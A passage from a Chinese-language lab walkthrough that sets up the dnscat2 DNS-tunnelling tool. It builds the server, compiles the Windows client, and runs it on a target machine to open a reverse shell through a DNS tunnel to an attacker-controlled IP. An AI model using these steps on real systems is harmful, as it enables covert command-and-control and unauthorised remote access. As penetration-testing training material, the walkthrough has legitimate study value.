- 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求
环境搭建
搭建服务端
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
apt-get install ruby-dev
bundle install
过程会有点慢
开启服务端
ruby ./dnscat2.rb
搭建客户端
这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了
将这个文件上传至win10靶机运行
开启客户端
dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0
剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层
进入弹回来的shell
